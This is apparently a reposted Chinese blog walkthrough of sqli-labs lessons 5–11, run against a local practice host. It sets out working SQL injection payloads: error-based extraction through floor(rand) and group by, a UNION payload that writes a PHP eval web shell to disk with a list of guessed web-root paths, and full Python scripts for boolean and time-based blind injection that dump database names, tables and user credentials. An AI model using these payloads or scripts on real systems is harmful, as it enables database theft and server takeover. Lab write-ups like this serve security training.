标签:11 name min max mid labs sqli time id
5&6 子查询注入
有mysql的错误显示
本质是floor(rand)函数与group组合情况下的报错
参考文章:https://www.cnblogs.com/BloodZero/p/4660971.html
payload1:查询库名
mysql> SELECT * FROM users WHERE id='0'union select 1,count(*),concat_ws(':',(select database()),floor(rand()*2)) as a from information_schema.tables group by a;
ERROR 1062 (23000): Duplicate entry 'security:1' for key 'group_key'
payload2:查询表名
mysql> SELECT * FROM users WHERE id='0'union select 1,count(*),concat_ws(':',(select table_name from information_schema.tables),floor(rand()*2)) as a from information_schema.tables where table_schema='security' group by a;
ERROR 1242 (21000): Subquery returns more than 1 row
这里提示说结果子查询超出一行,确认问题是处在这里
payload3:用limit一个一个查询表名
mysql> SELECT * FROM users WHERE id='0'union select 1,count(*),concat_ws(':',(select table_name from information_schema.tables where table_schema='security' limit 3,1),floor(rand()*2)) as a from information_schema.tables where table_schema='security' group by a;
ERROR 1062 (23000): Duplicate entry 'users:1' for key 'group_key'
payload4:查询列名
mysql> SELECT * FROM users WHERE id='0'union select 1,count(*),concat_ws(':',(select column_name from information_schema.columns where table_name='users' limit 1,1),floor(rand()*2)) as a from information_schema.tables where table_schema='security' group by a;
ERROR 1062 (23000): Duplicate entry 'username:1' for key 'group_key'
payload:查询内容
mysql> SELECT * FROM users WHERE id='0'union select 1,count(*),concat_ws(':',(select concat(username) from users limit 0,1),floor(rand()*2)) as a from information_schema.tables where table_schema='security' group by a;
ERROR 1062 (23000): Duplicate entry 'Dumb:0' for key 'group_key'
6与5差别在单引号和双引号
payload:http://sql.test/Less-6/?id=1%22union%20select%20null,count(*),concat_ws(%27:%27,(select%20username%20from%20users%20limit%200,1),floor(rand()*2))as%20a%20from%20information_schema.tables%20group%20by%20a--+
7 利用文件写入一句话木马
首先吐槽一下这里的闭合方式,试了半天没办法看代码才知道,两个括号。。。
这一题需要用sql语句来进行文件操作。
需要用到函数select 'xxx' into outfile 'xxx';
用到这个的时候需要文件的绝对地址,而我们只能凭借经验来猜测。
根据系统和数据库猜测,如winserver的iis默认路径是c:/inetpub/wwwroot/,这好像说偏了,这是asp的,但知道也好
linux的nginx一般是/usr/local/nginx/html,/home/wwwroot/default,/usr/share/nginx,/var/www/htm等
apache 就/var/www/htm,/var/www/html/htdocs
payload:http://sql.test/Less-7/?id=0%27))union%20select%20null,null,%27%3C?php%20@eval($_POST[a]);?%3E%27into%20outfile%20%22D:/sqli-labs-master/test.php%22--+
8 布尔盲注
就是相比第五题关闭了报错显示
分析一下语句:SELECT * FROM users WHERE id='1'and ((select database())='secrity')-- ' LIMIT 0,1
无报错,根据是否返回you are in...来判断sql执行结果
那么找到可以执行的语句
mysql> SELECT * FROM users WHERE id='1'and (ascii(mid((database()),1,1))>200);
Empty set (0.00 sec)
mysql> SELECT * FROM users WHERE id='1'and (ascii(mid((database()),1,1))>2);
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 1 | Dumb | Dumb |
+----+----------+----------+
1 row in set (0.00 sec)
附上脚本
import requests
from tqdm import tqdm
import time
def bp(name,payload):
for j in tqdm(range(1, 200)):
min = 33
max = 127
while abs(min - max) > 1: # s
mid = int((min + max) * 0.5)
payloadd = payload.format(str(j), str(mid))
rsp = requests.get(url=url + payloadd)
rsp.encoding = 'utf-8'
if ("You are in..." in rsp.text):
min = mid
else:
max = mid
# print(str(min)+"-"+str(max))
name += chr(max)
print(name)
if(name[-1:]==name[-2:-1]):
break
return name
url="http://sql.test/Less-8/"
databasename=""
tablename=""
t1=time.time()
payload1 = '?id=1%27and%20(ascii(mid(database(),{},1))>{})%23'
databasename=bp(databasename,payload1)
payload2 ="?id=1%27and%20(ascii(mid((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema='"+databasename+"'),{},1))>{})%23"
tablename=bp(tablename,payload2)
t2=time.time()
print("总共时长为:")
print(t2-t1)
print(databasename+"\n"+tablename)
#下面是第二个脚本
import requests
from tqdm import tqdm
def bp(name,payload):
for j in tqdm(range(1, 200)):
min = 33
max = 127
while abs(min - max) > 1: # s
mid = int((min + max) * 0.5)
payloadd = payload.format(str(j), str(mid))
rsp = requests.get(url=url + payloadd)
rsp.encoding = 'utf-8'
if ("You are in..." in rsp.text):
min = mid
else:
max = mid
# print(str(min)+"-"+str(max))
name += chr(max)
print(name)
if(name[-1:]==name[-2:-1]):
break
return name
url="http://sql.test/Less-8/"
usernamepassword=""
payload3 ="?id=1%27and%20(ascii(mid((select%20group_concat(username,':',password%20separator%20'<br>')%20from%20users),{},1))>{})%23"
usernamepassword=bp(usernamepassword,payload3)
print(usernamepassword)
9 时间盲注
看一下源码,不论sql查询语句的结果是否为空都返回you are in...
想办法构造一下payload,测试成功:?id=0%27or%20if((ascii(mid((database()),{},1))>{}),sleep(0.3),0)--+
import requests
from tqdm import tqdm
import time
def bp(name,payload):
for j in tqdm(range(1, 200)):
min = 33
max = 127
while abs(min - max) > 1: # s
mid = int((min + max) * 0.5)
payloadd = payload.format(str(j), str(mid))
# print()
t1=time.time()
rsp = requests.get(url=url + payloadd)
rsp.encoding = 'utf-8'
t2=time.time()
if (t2-t1>5):
min = mid
else:
max = mid
# print(str(min)+"-"+str(max))
name += chr(max)
print(name)
if(name[-1:]==name[-2:-1]):
break
return name
databasename =''
tablename =''
url="http://sql.test/Less-9/"
# payload1 = '?id=0%27or%20if((ascii(mid((database()),{},1))>{}),sleep(0.3),0)--+'
# databasename=bp(databasename,payload1)
databasename='security'
payload2 ="?id=0%27or%20if((ascii(mid((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema='"+databasename+"'),{},1))>{}),sleep(0.3),0)--+"
tablename=bp(tablename,payload2)
#下面是求字段的脚本
#这里的payload写了好久,太长了容易看错,需要仔细一点
import requests
import time
from tqdm import tqdm
def bp(name,payload):
for j in tqdm(range(1, 200)):
min = 33
max = 127
while abs(min - max) > 1: # s
mid = int((min + max) * 0.5)
payloadd = payload.format(str(j), str(mid))
t1 = time.time()
rsp = requests.get(url=url + payloadd)
rsp.encoding = 'utf-8'
t2 = time.time()
if (t2 - t1 > 5):
min = mid
else:
max = mid
# print(str(min)+"-"+str(max))
name += chr(max)
print(name)
if(name[-1:]==name[-2:-1]):
break
return name
url="http://sql.test/Less-9/"
usernamepassword=""
# payload3 ="?id=0%27or%20if(ascii(mid((select% group_concat(username,':',password separator '<br>') from users),{},1))>{}),sleep(0.3),0)%23"
# payload3 ="?id=0%27or%20if((ascii(mid((select group_concat(username,':',password separator '<br>') from users),{},1)>{}),sleep(0.3),0)%23"
payload3 ="?id=0%27or%20if((ascii(mid((select group_concat(username,':',password separator '<br>')from users),{},1))>{}),sleep(0.3),0)--+"
usernamepassword=bp(usernamepassword,payload3)
print(usernamepassword)
10
相比于第九题将单引号改成了双引号
import requests
from tqdm import tqdm
import time
def bp(name,payload):
for j in tqdm(range(1, 200)):
min = 33
max = 127
while abs(min - max) > 1: # s
mid = int((min + max) * 0.5)
payloadd = payload.format(str(j), str(mid))
# print()
t1=time.time()
rsp = requests.get(url=url + payloadd)
rsp.encoding = 'utf-8'
t2=time.time()
if (t2-t1>5):
min = mid
else:
max = mid
# print(str(min)+"-"+str(max))
name += chr(max)
print(name)
if(name[-1:]==name[-2:-1]):
break
return name
databasename =''
tablename =''
url="http://sql.test/Less-10/"
payload1 ='?id=0"or if((ascii(mid((database()),{},1))>{}),sleep(0.3),0)--+'
databasename=bp(databasename,payload1)
databasename='security'
payload2 ='?id=0"or%20if((ascii(mid((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema='"+databasename+"'),{},1))>{}),sleep(0.3),0)--+'
tablename=bp(tablename,payload2)
#下面是求字段的脚本
# import requests
# import time
# from tqdm import tqdm
#
# def bp(name,payload):
# for j in tqdm(range(1, 200)):
# min = 33
# max = 127
# while abs(min - max) > 1: # s
# mid = int((min + max) * 0.5)
# payloadd = payload.format(str(j), str(mid))
# t1 = time.time()
# rsp = requests.get(url=url + payloadd)
# rsp.encoding = 'utf-8'
# t2 = time.time()
# if (t2 - t1 > 5):
# min = mid
# else:
# max = mid
# # print(str(min)+"-"+str(max))
# name += chr(max)
# print(name)
# if(name[-1:]==name[-2:-1]):
# break
# return name
#
# url="http://sql.test/Less-9/"
# usernamepassword=""
# # payload3 ="?id=0%27or%20if(ascii(mid((select% group_concat(username,':',password separator '<br>') from users),{},1))>{}),sleep(0.3),0)%23"
# # payload3 ="?id=0%27or%20if((ascii(mid((select group_concat(username,':',password separator '<br>') from users),{},1)>{}),sleep(0.3),0)%23"
# payload3 ='?id=0"or%20if((ascii(mid((select group_concat(username,':',password separator '<br>')from users),{},1))>{}),sleep(0.3),0)--+'
# usernamepassword=bp(usernamepassword,payload3)
# print(usernamepassword)
11 报错注入
非标准解法
标签:11,name,min,max,mid,labs,sqli,time,id 来源: https://www.cnblogs.com/yuxiazhengye/p/15881723.html
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。